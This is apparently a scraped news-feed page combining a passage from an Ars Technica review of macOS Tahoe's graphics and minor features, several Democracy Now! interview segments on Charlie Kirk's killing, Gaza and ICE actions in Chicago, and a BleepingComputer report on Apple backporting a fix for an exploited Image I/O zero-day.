But the main problem—especially for Apple's platforms, where the vast majority of users will be using the lower-end GPUs in the basic M1, M2, M3, and M4 chips rather than the beefier GPUs in the Pro, Max, or Ultra versions—is that frame-generation features need a reasonably high base frame rate to generate decent-looking results.
Think about how jerky a game looks when it's running at 15 or 20 frames per second—the onscreen image can change a lot from one frame to the next. That dramatically increases the likelihood that the interpolated frame in between the two rendered frames will look weird in some way, because the algorithm is just having to guess too much about the motion happening in between those two frames. Frame interpolation is good for making a smooth-running game look smoother; it's not a good tool for making an unplayable frame rate into a playable one.
The new upscaling features should be more broadly useful, even for the lower-end GPUs in Apple's products. For one, MetalFX now allows developers to change the input resolution dynamically. Say you're usually converting natively rendered 1080p frames into 4K frames, but your game hits a particularly complicated scene that's harder to render. MetalFX can briefly change that 1080p input resolution to something lower, which would briefly reduce image quality (since the upscaler is now turning an even lower-resolution image into a 4K image) in the interest of maintaining smoothness. Think of it as switching between the upscaler's "Quality" and "Performance" modes automatically, based on the complexity of the scene being rendered.
Metal 4 adds denoised upscaling to MetalFX, which is particularly useful when trying to provide high-quality upscaling for the ray-traced lighting effects that M3 and M4-series GPUs can render.
Those gaming improvements are helped along by some of the improvements on the GPU-compute side. These improvements include the addition of tensors, which can help with image upscaling and interpolation as well as accelerate machine-learning and AI-related workloads.
We spoke with John Poole, founder of Primate Labs and developer of Geekbench, about what some of the Metal 4 additions would improve for developers and users.
"Metal 4 tensors enable developers to combine machine learning and graphics operations within the same pipeline, improving performance and efficiency since the application no longer has to move data between separate machine learning and graphics pipelines," Poole wrote to Ars. "Applications that only run machine learning or GPU compute pipelines won't benefit much from this change, as there's no need to move data between separate pipelines. I took a look at Geekbench 6 GPU and Geekbench AI GPU benchmark scores for macOS 15.6 and macOS 26.0 and saw modest improvements at best in both."
"Developers may appreciate having tensors as a first-class storage type, though, as it will make writing machine learning GPU kernels easier," Poole continued. "I expect this change is primarily a runtime change (in that it doesn't require hardware support), which is why it's available on older Macs, iPhones, and iPads."
One throughline for most of the major additions to Metal 4: They're all attempts to keep Apple relevant in areas where its competitors, most notably Nvidia, currently have the upper hand.
Metal 4 does require a sufficiently modern Apple Silicon processor—either an Apple M1 or newer on the Mac side, or an Apple A14 Bionic or newer on iPhones and some iPads. Intel Macs and the very oldest supported iPhones and iPads with A12 and A13-series chips won't see any benefits.
Game Porting Toolkit 3.0
The other gaming improvement for Mac this year is version 3.0 of Apple's Game Porting Toolkit. The GPTK is formally a tool meant for developers who want to start exploring a Mac port by testing their existing Windows games through translation layers, converting DirectX API calls into Metal API calls that the Mac can work with (SteamOS and the Steam Deck run Windows games on Linux the same way, also thanks to many of the exact same open source projects).
But other companies and community members have used it to run unmodified Windows games on their Macs with no effort required on the part of the game developers. The most prominent paid solution is
Crossover
;
Whisky
was a prominent community-developed alternative, but its developer
stepped away from the project earlier this year
. Projects like
Sikarugir
promise similar results, though it doesn't have the same reputation for user-friendliness.
This year's GPTK update uses Metal 4's upscaling and frame-generation improvements to translate Nvidia's DLSS upscaling and frame generation in games that support it. Enable DLSS in the Windows games you're trying to run, and the GPTK will attempt to translate it to MetalFX.
YouTuber Andrew Tsai
tested
a series of 10 Windows games using a beta version of GPTK 3.0 and CrossOver a couple of months ago. He generally came away impressed—version 3.0 of the GPTK adds enough features and fixes that some games that ran with glitches or visual artifacts now look just fine, and some games (including
Starfield
) that failed to run at all under older versions of the toolkit are now also working OK.
For all of Apple's gaming efforts, the company still tends to be announcing the same kinds of games: AAA titles from a couple of years ago that have already been available on the PC and consoles for quite a while. "Any AAA games at all" is an improvement over where the Mac was a few years ago, but we still haven't reached that tipping point where big games are being released simultaneously on both the PC and the Mac (give or take
the odd indie megahit
).
Grab Bag
Observing hallowed, time-honored tradition, let's take a minute to run down a list of changes that are worth documenting, but are either too small or too niche to need extended pontification. That's right, folks, it's the Grab Bag.
Lock screen typeface options
Tahoe's lock screen gets a customizable clock, though it still lags behind the iOS and iPadOS lock screens in customizability features.
Credit:
Andrew Cunningham
The lock screen on the Mac remains a desolate place, relative to the same area in both iOS and iPadOS—this is still a no-notifications, no-widgets zone that exists only to keep your Mac locked. But Apple will at least let you customize the look of the clock now, with a list of half a dozen typefaces that mirrors those available in iOS and iPadOS (but without the same color customization options, for some reason).
The setting to change the typeface is a bit buried and separate from all the other lock screen settings. You'll find it by opening Settings, clicking Wallpaper, and then clicking the Clock Appearance button. Select the typeface you want and the weight of the typeface (if applicable), and select whether to display it over the lock screen, over both the lock screen and your screen saver, or to turn it off entirely.
Live translation
We'll have more about Apple's live translation features in our upcoming iOS 26 review, since it's slightly more relevant on Apple's mobile handheld software platform than on the Mac. But Macs that support Apple Intelligence—every Apple Silicon model going back to the M1—can translate messages and voice calls and provide subtitles for FaceTime calls using on-device language models. I still find most of Apple's AI-related features to be either underwhelming or inessential, but this one does feel like it could be genuinely useful for travelers or anyone looking to circumvent a language barrier.
Live Activities from iOS
A Live Activity from an iPhone app, displayed in the macOS menu bar.
Credit:
Andrew Cunningham
When you've got an iPhone paired with your Mac via iPhone Mirroring, you'll now automatically see pop-ups for Live Activities appear in your menu bar when they're active on the phone.
The small, black ovular widget appears on the left side of the right-hand menu bar area, with an icon and an estimated time when the activity is due to be completed. Tracking your takeout order? Trying to squeeze in five more minutes of something while you wait for your Lyft to show up? If it's on your phone, you can see it on the Mac.
New wallpaper screensavers
We've mentioned this elsewhere already, but Tahoe comes with a small collection of new moving wallpapers themed around the codename—these are the wallpapers that can start moving to act as a screensaver, and then slow down and come to a stop when it's time to be a desktop wallpaper again.
Nothing here has the retro-cool factor of last year's classic Macintosh-themed wallpaper, but there are still some pretty ones: light and dark versions of an abstract blue glassy swirl that kind of evokes flowing water, and a shot of the shores of Lake Tahoe during four different times of day.
Several new motion wallpapers are available in the Landscapes category, too: new locations include Goa, the Himalayas, the Ganges, and tea gardens in Kerala, India, along with a couple others. The Cityscape, Underwater, Earth, and other categories appear to have all the same wallpapers available as in Sequoia.
Two-factor autofill in any browser
When it's possible, you should move on from using SMS messages for two-factor authentication to codes generated by an app or to passkeys. But there are still plenty of times when you'll run into authentication code texts, either because you're trying to set up an account for the first time, or because the thing you're trying to log in to doesn't support anything else.
For those cases, Tahoe adds a handy feature: the ability to autofill these codes from the Messages and Mail apps into any browser, not just Safari. Just like when you use the equivalent feature in Safari or on iOS, macOS can delete these codes for you automatically after using them.
Game Overlay
The Game Overlay in macOS Tahoe.
Credit:
Andrew Cunningham
Tahoe's new Game Overlay doesn't add features so much as it groups existing gaming-related features to make them more easily accessible.
The overlay makes itself available any time you start a game, either via a keyboard shortcut or by clicking the rocketship icon in the menu bar while a game is running. The default view includes brightness and volume settings, toggles for your Mac's energy mode (for turning on high-performance or low-power mode, when they're available), a toggle for Game Mode, and access to controller settings when you've got one connected.
The second tab in the overlay displays achievements, challenges, and leaderboards for the game you're playing—though only if they offer Apple's implementation of those features. Achievements for games installed from Steam, for example, aren't visible. And the last tab is for social features, like seeing your friends list or controlling chat settings (again, when you're using Apple's implementation).
More granular notification summaries
I didn't think the
Apple Intelligence notification summaries
were very useful when they launched in iOS 18 and macOS 15 Sequoia last year, and I don't think iOS 26 or Tahoe really changes the quality of those summaries in any immediately appreciable way. But following a controversy earlier this year where the summaries botched major facts in breaking news stories, Apple turned notification summaries for news apps off entirely while it worked on fixes.
Those fixes,
as we've detailed elsewhere
, are more about warning users of potential inaccuracies than about preventing those inaccuracies in the first place.
Apple now provides three broad categories of notification summaries: those for news and entertainment apps, those for communication and social apps, and those for all other kinds of apps. Summaries for each category can be turned on or off independently, and the news and entertainment category has a big red disclaimer warning users to "verify information" in the individual news stories before jumping to conclusions. Summaries are italicized, get a special icon, and a "summarized by Apple Intelligence" badge, just to make super-ultra-sure that people are aware they're not taking in raw data.
Personally, I think if Apple can't fix the root of the problem in a situation like this, then it's best to take the feature out of iOS and macOS entirely rather than risk giving even one person information that's worse or less accurate than the information they already get by being a person on the Internet in 2025.
As we wrote a few months ago, asking a relatively small on-device language model to accurately summarize any stack of notifications covering a wide range of topics across a wide range of contexts is setting it up to fail. It does work OK when summarizing one or two notifications, or when summarizing straightforward texts or emails from a single person. But for anything else, be prepared for hit-or-miss accuracy and usefulness.
Relocated volume and brightness indicators
The pop-ups you see when adjusting the system volume or screen brightness have been redesigned and moved. The indicators used to appear as large rounded squares, centered on the lower half of your primary display. The design had changed over the years, but this was where they've appeared throughout the 25-year existence of Mac OS X.
Now, both indicators appear in the upper-right corner of the screen, glassy rectangles that pop out from items on the menu bar. They'll usually appear next to the Control Center menu bar item, but the volume indicator will pop out of the Sound icon if it's visible.
New low battery alert
Tahoe picks up an iPhone-ish low-battery alert on laptops.
Credit:
Andrew Cunningham
Tahoe tweaks the design of macOS's low battery alert notification. A little circle-shaped meter (in the same style as battery meters in Apple's Batteries widgets) shows you in bright red just how close your battery is to being drained.
This notification still shows up separately from others and can't be dismissed, though it doesn't need to be cleared and will go away on its own. It starts firing off when your laptop's battery hits 10 percent and continues to go off when you drop another percentage point from there (it also notified me without the percentage readout changing, seemingly at random, as if to annoy me badly enough to plug my computer in more quickly).
The notification frequency and the notification thresholds can't be changed, if this isn't something you want to be reminded about
or
if it's something you want to be reminded about even earlier. But you could possibly use the battery level trigger in Shortcuts to customize your Mac's behavior a bit.
Recovery mode changes
A new automated recovery tool in macOS Tahoe's recovery volume.
Credit:
Andrew Cunningham
Tahoe's version of the macOS Recovery mode gets a new look to match the rest of the OS, but there are a few other things going on, too.
If you've ever had a problem getting your Mac to boot, or if you've ever just wanted to do a totally fresh install of the operating system, you may have run into the Mac's built-in recovery environment before. On an Apple Silicon Mac, you can usually access it by pressing and holding the power button when you start up your Mac and clicking the Options button to start up using the hidden recovery volume rather than the main operating system volume.
Tahoe adds a new tool called the Device Recovery Assistant to the recovery environment, accessible from the Utilities menu. This automated tool "will look for any problems" with your system volume "and attempt to resolve them if found."
Maybe the Recovery Assistant will actually solve your boot problems, and maybe it won't—it doesn't tell you much about what it's doing, beyond needing to unlock FileVault on my system volume to check it out. But it's one more thing to try if you're having serious problems with your Mac and you're not ready to countenance a clean install yet.
The web browser in the recovery environment is still WebKit, but it's not Safari-branded anymore, and it sheds a lot of Safari features you wouldn't want or need in a temporary OS.
Credit:
Andrew Cunningham
Apple has made a couple of other tweaks to the recovery environment, beyond adding a Liquid Glass aesthetic. The recovery environment's built-in web browser is simply called Web Browser, and while it's still based on the same WebKit engine as Safari, it doesn't have Safari's branding or its settings (or other features that are extraneous to a temporary recovery environment, like a bookmarks menu). The Terminal window picks up the new Clear theme, new SF Mono Terminal typeface, and the new default 120-row-by-30-column size.
A new disk image format
Not all Mac users interact with disk images regularly, aside from opening them up periodically to install an app or restore an old backup. But among other things, disk images are used by Apple’s Virtualization framework, which makes it relatively simple to run macOS and Linux virtual machines on the platform for testing and other things. But the RAW disk image format used by older macOS versions can come with quite severe performance penalties, even with today’s powerful chips and fast PCI Express-connected SSDs.
Enter the Apple Sparse Image Format, or ASIF. Apple’s developer documentation says that because ASIF images’ “intrinsic structure doesn’t depend on the host file system’s capabilities,” they “transfer more efficiently between hosts or disks.” The upshot is that reading files from and writing files to these images should be a bit closer to your SSD's native performance (Howard Oakley at The Eclectic Light Company has some testing that
suggests significant performance improvements
in many cases, though it’s hard to make one-to-one comparisons because testing of the older image formats was done on older hardware).
The upshot is that disk images should be capable of better performance in Tahoe, which will especially benefit virtual machines that rely on disk images. This could benefit the lightweight virtualization apps like
VirtualBuddy
and
Viable
that mostly exist to provide a front end for the Virtualization framework, as well as virtualization apps like Parallels that offer support for Windows.
Quantum-safe encryption support
You don’t have a quantum computer on your desk. No one does, outside of labs where this kind of technology is being tested. But when or if they become more widely used, they’ll render many industry-standard forms of encryption relatively easy to break.
Tahoe and Apple’s other OS updates this year add support for quantum-safe encryption
algorithms like ML-KEM and ML-DSA to CryptoKit
, the framework that allows third-party apps to leverage macOS’s built-in encryption technologies. This comes a year and a half or so after Apple
began protecting iMessage conversations
with post-quantum encryption algorithms.
Microsoft is also improving Windows 11’s support for quantum-safe encryption algorithms, as it announced
earlier this year
. We’re unlikely to need these improved encryption algorithms soon, but by adding support to their operating systems relatively early, companies like Microsoft and Apple make it more likely that the transition will be smoother and less visible for their end users.
More post-processing options for video and images
Apple's
VideoToolbox framework
is what handles hardware-accelerated video encoding and decoding on Apple's platforms, and this year it's picking up a new
VTFrameProcessor API
that allows developers who use machine learning algorithms to enhance video playback and editing.
A frame rate conversion effect can adjust the frame rate of a video, something that can create a slow-mo effect in videos that weren't shot in slow-mo, and motion blur effect can be added to videos, too. A Super Resolution scaler can intelligently upscale low-resolution videos. For video chats, a low-latency Super Resolution filter, temporal noise filtering, and frame interpolation can improve video quality and smooth a low-frame-rate video chat.
Technically, the Mac saw the first versions of these improvements in the 15.4 update for Sequoia; the new VTFrameProcessor API is only new to iOS 26, iPadOS 26, and Catalyst apps that have been repackaged for the Mac. But additions like this can escape notice when these smaller updates come out, so it's worth calling attention to for Tahoe upgraders.
Tahoe clears the decks
The macOS Tahoe release will probably be remembered mostly for Liquid Glass. It’s a major change to the way things look, and for better or worse, those shifts tend to suck the oxygen out of the room.
I could take or leave Liquid Glass—I mostly don't mind it, but I’m not sure I'm convinced that it's an unambiguous improvement over what Apple was using before. The standalone instances of messy overlap or overzealous translucency aren't dealbreakers, but they are small regressions in usability and accessibility that Apple will need to keep massaging over time, just as it did after iOS 7 was released. And while I see the value in visual consistency, I do think forcing apps to use a rounded square icon no matter what gives them one less way to distinguish themselves from each other in the Dock, the Finder, or Spotlight.
But even Liquid Glass-skeptical power users should find enough things to like in Tahoe to justify the installation. Maybe you’re already using a clipboard manager or Spotlight replacement that already does more than Apple’s new-and-improved version, but Quick Keys, automated Shortcuts, additional theming options, a more capable version of Metal, and the typical trail-mix-bag full of odds and ends all add up to a release that would feel pretty useful even if it looked the same as it did last year.
Getting this visual transition out of the way now also clears the decks for what could be a pretty busy macOS 27. Ending support for the last handful of Intel Macs gives Apple a cruft-clearing opportunity that it hasn’t had since
2009’s Snow Leopard release
ended support for PowerPC Macs. And who knows what other features might be possible once the Mac shifts from Apple Silicon-first to Apple Silicon-only? We’ll find out in nine months or so.
Andrew is a Senior Technology Reporter at Ars Technica, with a focus on consumer tech including computer hardware and in-depth reviews of operating systems like Windows and macOS. Andrew lives in Philadelphia and co-hosts a weekly book podcast called
Overdue
.
Bishop William Barber Condemns Charlie Kirk Murder and the Right's Religious Nationalism
Democracy Now!
www.democracynow.org
2025-09-16 13:34:58
We speak to Bishop William J. Barber II about conservative Christian activist Charlie Kirk’s killing and the right-wing weaponization of his death. Barber says outrage over political violence should also extend beyond Kirk’s assassination, to what he refers to as the political violence ...
Immigration raids are spreading across the country. The agencies meant to protect public health are being dismantled from within. Public broadcasting is being defunded... Today, Democracy Now!'s independent reporting is more important than ever. Because we never accept corporate or government funding, we rely on viewers, listeners and readers like you to sustain our work.
Can you start a monthly donation?
Monthly donors represent more than 20 percent of our annual revenue.
Every dollar makes a difference
. Thank you so much.
Democracy Now!
Amy Goodman
Non-commercial news needs your support.
We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.
We speak to Bishop William J. Barber II about conservative Christian activist Charlie Kirk’s killing and the right-wing weaponization of his death. Barber says outrage over political violence should also extend beyond Kirk’s assassination, to what he refers to as the political violence of policy, including the hundreds around the world who die of poverty, war and disease every day. “You cannot claim that you believe in a god or Christ of love and justice and mercy and grace and truth, and then you push policies that
prey
on the very persons, in the very communities, that the Scriptures, that the example of Jesus and the prophet tells us we should not only
pray
for, but we should also be lifting up and helping up and protecting.”
president of Repairers of the Breach, national co-chair of the Poor People’s Campaign and founding director of the Center for Public Theology & Public Policy at Yale Divinity School.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Non-commercial news needs your support
We rely on contributions from our viewers and listeners to do our work.
Please do your part today.
Block the Bombs to Israel: Rep. Delia Ramirez Denounces Genocide in Gaza
Democracy Now!
www.democracynow.org
2025-09-16 13:28:54
Congressmember Delia Ramirez, one of the co-sponsors of the Block the Bombs Act, which would withhold offensive weapons that violate international law and humanitarian norms deals from Israel, responds to a U.N. commission’s recent conclusion that Israel is committing genocide in Gaza. She pro...
This is a rush transcript. Copy may not be in its final form.
AMY
GOODMAN
:
I know you have to go, Congressmember Ramirez, but I wanted to ask you about this latest news. A United Nations inquiry has concluded Israel has committed genocide in Gaza. This is Navi Pillay, who headed the commission.
NAVI
PILLAY
:
In our report, the commission found that the Israeli authorities and Israeli security forces committed and are continuing to commit the following underlying acts of genocide against the Palestinians in the Gaza Strip: one, killing members of the group; two, causing serious bodily or mental harm to members of the group; three, deliberately inflicting on the group conditions of life calculated to bring about its physical destruction in whole or in part; and, four, imposing measures intended to prevent births within the group.
AMY
GOODMAN
:
Congressmember Delia Ramirez, you have called for — you just recently held a news conference with Mahmoud Khalil and others calling for an arms embargo against Israel. Explain.
REP
.
DELIA
RAMIREZ
:
Yeah, well, first of all, Israel is committing a genocide, and I think it’s indefensible for anyone to, in this moment, try to make an excuse of what’s happening and allowing it to happen under our watch. I have a bill. It’s a specific, concrete bill that blocks bombs to Israel. It is one of the first bills in its nature, where now we have 47 members of Congress who have joined the bill. And it says we are going to withhold weapons. We’re not going to allow Donald Trump and Bibi Netanyahu to just easily make a transfer of these weapons, that we know have violated international law and killed babies. This afternoon, I will be having a deep discussion with a number of my colleagues, calling for them directly, in a meeting, urging them to join this bill immediately and bring it to a committee hearing in Armed Services, in the jurisdiction of the bill.
JUAN
GONZÁLEZ:
Yeah, I just wanted to ask Kevin Herrera: In the lawsuit that you, that your plaintiffs filed, they talked about, as well, the way that Venezuelans were singled out by these off-duty police, that they picked up the Venezuelans and beat them and had them arrested, but not other day laborers. Could you talk about that, as well?
KEVIN
HERRERA
:
Yes, that’s correct. Based on the facts that we’ve heard from each of our plaintiffs, the off-duty police officers and Home Depot security, who dragged those individuals into the back of the Home Depot and abused them, also used nationalist epithets regarding their ethnicity, specifically accusing them of being Venezuelan, of being recent arrivals, of being someone that the government didn’t want there. One of our clients, who’s Colombian, told them that he was Colombian, and they said he was lying, and proceeded to hit him again.
So, with Willian, one of the saddest facts of his case is that he was profiled initially, during the first trauma that he experienced at the Home Depot, and now, over a year later, he’s been profiled again via the ways in which
ICE
is selecting people based on the color of their skin, based on their language and how they speak it, whether they speak with an accent, and here, apparently, based on their ability to speak out and call out injustice and racism in the United States. William was double-profiled, and now he’s suffering consequences within the
ICE
detention system, after he had already been through so much at the Home Depot.
AMY
GOODMAN
:
Kevin Herrera, we want to thank you so much for being with us — of course, we’ll continue to follow this case — legal director of Raise the Floor Alliance. He’s an attorney for Willian Giménez González, speaking to us from Chicago. And thank you also to Congressmember Delia Ramirez of Chicago, the first Latina congressmember to represent Illinois.
And this sad news, just in: The acclaimed, Oscar-winning actor Robert Redford died early this morning at his home in Utah. He was 89 years old. He founded the Sundance Film Festival, which will be for the last time in Utah this next year and then move on to Boulder. Again, the Oscar-winning director and actor Robert Redford has died at the age of 89. To see all of our
interviews
with Robert Redford at
Democracy Now!
as we attended the Sundance Film Festival over the years, go to democracynow.org.
Coming up, Reverend William Barber talking about the assassination of Charlie Kirk, Christian nationalism and more. Stay with us.
[break]
AMY
GOODMAN
:
“Hog of the Forsaken” by the late folk legend Michael Hurley, performing in our
Democracy Now!
studio.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Apple backports zero-day patches to older iPhones and iPads
Bleeping Computer
www.bleepingcomputer.com
2025-09-16 13:16:53
Apple has released security updates to backport patches released last month to older iPhones and iPads, addressing a zero-day bug that was exploited in "extremely sophisticated" attacks. [...]...
Apple has released security updates to backport patches released last month to older iPhones and iPads, addressing a zero-day bug that was exploited in "extremely sophisticated" attacks.
This security flaw is the same one Apple
has patched
for devices running iOS 18.6.2 and iPadOS 18.6.2, iPadOS 17.7.10, and macOS (Sequoia 15.6.1, Sonoma 14.7.8, and Ventura 13.7.8) on August 20.
Tracked as
CVE-2025-43300
, this vulnerability was discovered by Apple security researchers and is caused by an
out-of-bounds write weakness
in the Image I/O framework, which enables apps to read and write image file formats.
An out-of-bounds write occurs when attackers supply maliciously crafted input to a program that causes it to write data outside the allocated memory buffer, potentially triggering crashes, corrupting data, or even allowing remote code execution.
Apple has now addressed this zero-day flaw in iOS 15.8.5 / 16.7.12, as well as iPadOS 15.8.5 / 16.7.12, with improved bounds checks.
"Processing a malicious image file may result in memory corruption. An out-of-bounds write issue was addressed with improved bounds checking," the company said in
Monday
advisories
.
"Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals."
The list of devices impacted by this vulnerability is quite extensive, with the bug affecting a wide range of older models, including:
iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPhone 8, iPhone 8 Plus, and iPhone X,
iPad Air 2, iPad mini (4th generation), iPad 5th generation, iPad Pro 9.7-inch, iPad Pro 12.9-inch 1st generation, and iPod touch (7th generation)
In late August, WhatsApp patched a
zero-click vulnerability
(CVE-2025-55177) in its iOS and macOS messaging clients, which was chained with Apple's CVE-2025-43300 zero-day in targeted attacks that the company described as "extremely sophisticated."
While Apple and WhatsApp have yet to release any details regarding the attacks chaining the two vulnerabilities, Donncha Ó Cearbhaill, the head of Amnesty International's Security Lab,
said
that WhatsApp warned some of its users that their devices were targeted in an advanced spyware campaign.
ICE Kills Immigrant Father After Traffic Stop, Detains Day Laborer Who Sued Chicago Police
Democracy Now!
www.democracynow.org
2025-09-16 13:16:05
ICE’s “Operation Midway Blitz” in Chicago is entering its second week of ramped-up immigration enforcement. Community members are mourning the loss of Silverio Villegas Gonzales, a 38-year-old single father and Mexican immigrant who was shot and killed by ICE agents while trying to...
This is a rush transcript. Copy may not be in its final form.
AMY
GOODMAN
:
Just days into Trump’s deployment of hundreds of federal immigration officers to Chicago,
ICE
agents fatally shot Silverio Villegas Gonzales after the 38-year-old father panicked and began to drive away in his car trying to evade arrest. Minutes earlier on Friday, Villegas Gonzales had dropped off his children at school.
ICE
claimed he dragged an
ICE
agent with his car; the officer then fired his weapon. Villegas Gonzales was unarmed and had no criminal record. He was born in Michoacán, Mexico, and worked as a cook.
The killing came as the Trump administration intensifies its immigration crackdown in Chicago under so-called Operation Midway Blitz, which
DHS
Assistant Secretary Tricia McLaughlin claimed would target, quote, “the worst of the worst.” The Cato Institute revealed earlier this year that 65% of immigrants arrested in Trump’s raids had no criminal convictions, and over 93% were never convicted of violent offenses.
Protesters gathered in the Chicago suburb of Franklin Park over the weekend demanding justice for Villegas Gonzales.
STEVE
:
This is not fair for our hard-working people, who come out here to this country to earn a living. And I just want to say God bless all. Hopefully it gets — best wishes for everybody. Hopefully everything gets better, situations. But we do need to tell
ICE
: Stop scaring our people.
AMY
GOODMAN
:
Silverio Villegas Gonzales’s family has organized a
fundraiser
to help cover the costs of his funeral and burial. In a statement, they wrote he was, quote, “someone who always extended a helping hand, shared his smile freely, and showed up for those he loved — no matter the circumstances.”
As
ICE
agents swarmed the streets of Chicago, advocates also reported the abduction of Willian Giménez González on Friday. He’s a day laborer who’s suing off-duty Chicago police, working as security for Home Depot, for abusing immigrant day laborers. His legal team says he was taken into custody by
ICE
in retaliation for his lawsuit. This is Miguel Alvelo Rivera, executive director of Latino Union of Chicago, speaking Saturday at a press conference.
MIGUEL
ALVELO
RIVERA
:
In the initial stages of preparing the lawsuit, we made sure Willian and the other workers understood the potential risks of going public about what they had experienced. Once people know who you are and that you’re standing for justice, they might bother you more than before. Willian took a deep breath, and, in our group’s meeting, he said, “I know, but I’m not only doing this to just get justice for myself and my compas. I’m doing this because I don’t want anybody else to ever have to live through what I have lived.”
AMY
GOODMAN
:
This all comes as President Trump is moving to deploy National Guard troops to Memphis, with threats that Chicago will be next.
For more, we’re joined by two guests. In Washington, D.C., Representative Delia Ramirez, Democratic congressmember from Illinois, is with us. She’s the first Latina congressmember to represent Illinois. And in Chicago, we’re joined by Kevin Herrera, legal director of Raise the Floor Alliance, an attorney for Willian Giménez González.
Congressmember, let’s begin with you and the killing of Silverio Villegas Gonzales. He was stopped in a traffic stop after bringing his kids to school. Explain what you understand happened next.
REP
.
DELIA
RAMIREZ
:
First of all, what happened to Silverio is absolutely devastating. What we understand is that the
ICE
report that they released and the footage we have seen does not match.
ICE
is saying that the agent had been dragged for a long distance. The footage shows that it was less than 100 feet. The footage also shows that there was an unmarked
SUV
that barricaded Silverio. I mean, the point is,
ICE
stopped a man right after he dropped off his child at school, because he’s Brown, because maybe he looked like he worked a minimum-wage job, and then shot him to death.
JUAN
GONZÁLEZ:
And, Congresswoman, the boss of Silverio in the hero shop where he worked claimed that he worked 11 hours a day, that he was a model worker. And your response to this continued criminalization of what is, essentially, many hard-working immigrants here in the country?
REP
.
DELIA
RAMIREZ
:
I mean, Juan, not only that, what people haven’t talked about, that not only was he a father to a 7- and a 3-year-old, he had full custody of these children. These children were left orphans because of
ICE
and the action they took that morning. It is bone-chilling. People are asking in Chicago, and certainly all over the country, “If I get stopped because I’m Brown, if I get stopped dropping off my child, will my child see me get shot by
ICE
?” because there’s no justice, no accountability in this precise moment in what they’re doing. And that is a test, and, I think, truly devastating, of our justice system, that there are agents who can do whatever they want, and they don’t have to abide by any enforcement and accountability.
JUAN
GONZÁLEZ:
And what’s been the response of the Chicago community, from the grassroots organizations to City Hall to the governor, in terms of these attacks and the threats of President Trump to bring in the National Guard in Chicago, as well?
REP
.
DELIA
RAMIREZ
:
Well, first, Juan, we need a thorough investigation of what happened. The footage, the witnesses we have talked to do not match what the
ICE
reports show. I think in order for people to feel like justice has been served, we need to know what exactly happened, the protocols, what training, or lack of, these agents had, how many agents were there. I think it’s really important, because people are asking themselves, “If Silverio could get shot, what will happen to me?”
And so, I will say to you that people on the ground around the city, and certainly we’ve seen around the country, they are saying, “We want to see justice for Silverio. We want to know the truth.” And organizations around the city are doubling down, providing protection, rapid response, showing up. Senator Karina Villa in West Chicago, another part of my district, where a number of agents showed up and started surrounding factories and schools, literally showed up and said to
ICE
, “You do not get to be here. Show me warrants if you want to arrest someone.” So, that level of organizing, with the local electeds, the grassroots organizations, that is what people are counting on to feel like there’s some sense of community coming together to protect them.
But that’s why I’m talking about filing legislation that begins to defund
ICE
, but also starts putting parameters of accountability here in Congress, because we cannot allow what’s happening to Silverio or children who are being left in a car as they take their mother and father on a main street, as we saw in Chicago, as well, this weekend.
JUAN
GONZÁLEZ:
I’d like to bring in Kevin Herrera also, the lawyer for Willian Giménez González. Kevin, if you could talk about the circumstances of your client being abducted by
ICE
agents on Friday?
KEVIN
HERRERA
:
Sure. Mr. Willian Giménez González is a brave, kind, hard-working man here in Chicago. And on Friday, he was on his way to the barber shop with his wife Mari, having worked a full week, to get in, you know, a little self-care and relaxation. They were stopped by
ICE
agents on their way into the barber shop. Those
ICE
agents told him his full name, asked him to confirm that he was indeed Willian Alberto Giménez González, and he confirmed that fact. When he chose to do so, they abducted him, took him into custody, and then he disappeared from contact with myself, with his wife for two days.
Mr. Giménez González, we believed, was in Broadview facility. I went there that same day, on Friday, to try and find him in the suburbs of Chicago. I received no acknowledgment at that correctional facility or the transfer processing center, I guess it is. And when I tried to speak to guards and tell them I was an attorney with a client inside, they wouldn’t acknowledge my presence. In fact, they waved their hands in my face. A day later, we gathered with Representative Ramirez, who’s on the call, as well as Representative Chuy García and Latino Union and supporters from his community, to call for information about him, to call for his release in front of that Broadview facility. Moments later, we received a phone call letting us know that he was in Broadview, but we got nothing more for the rest of the day. I filed a petition for
habeas corpus
at about 12:30 at night that night. But the following morning, I was told that he was moved out of state. So, that’s where we sit with Mr. Giménez González.
AMY
GOODMAN
:
Kevin Herrera, can you explain his — is it a class-action lawsuit against police who were being security for Home Depot, and what that lawsuit is about?
KEVIN
HERRERA
:
Sure. We believe Mr. Giménez González has received special attention from
ICE
, from the federal government, because of his role not in a class action, but as a plaintiff among four other day laborers, as well as an organizational plaintiff, Latino Union, which we filed in August '24, or 2024, against Home Depot, the city of Chicago and off-duty police officers. Mr. Giménez González was one of among several individuals who was pulled into Home Depot, while they were off of Home Depot property, by private security guards. And we've mentioned before that Mr. Giménez González acts as a day laborer, so he was seeking work from customers in the public outside of Home Depot. But once he was pulled inside, he was taken to a back room, beaten, and then made to sign a paper saying that he had committed trespass.
So, the functions of this operation by off-duty police working as Home Depot security was to essentially force people who were undocumented into the criminal legal system by forcing them to sign papers. Throughout the process, the allegations have been that this was an abuse via the assault, this was an unlawful deprivation of rights under civil rights laws which don’t allow for false arrest, and also civil rights laws that don’t allow for false allegations of crimes. What’s ironic is that the
ICE
press releases around Mr. Giménez González’s arrest have pointed to his criminal record of trespassing, which stems from these abuses at the Home Depot, as a reason and justification for his apprehension and disappearance.
AMY
GOODMAN
:
Congressmember Delia Ramirez, you’re calling for the defunding of
ICE
?
REP
.
DELIA
RAMIREZ
:
I am. I think it’s really important for us to understand $150 billion were just inserted into this organization, into this terror organization, that would be as big as the fifth-largest army in the world. They have no guardrails. There are no controls. They can do what they want. People, the family of Silverio, are asking: Who is investigating what happened to him? What will justice look like? And there’s no guardrails. I have said it before. It is time for us to start defunding them and also start establishing accountability, that is so desperately needed right now.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
FBI couldn't get my husband to decrypt his Tor node so he was jailed for 3 years
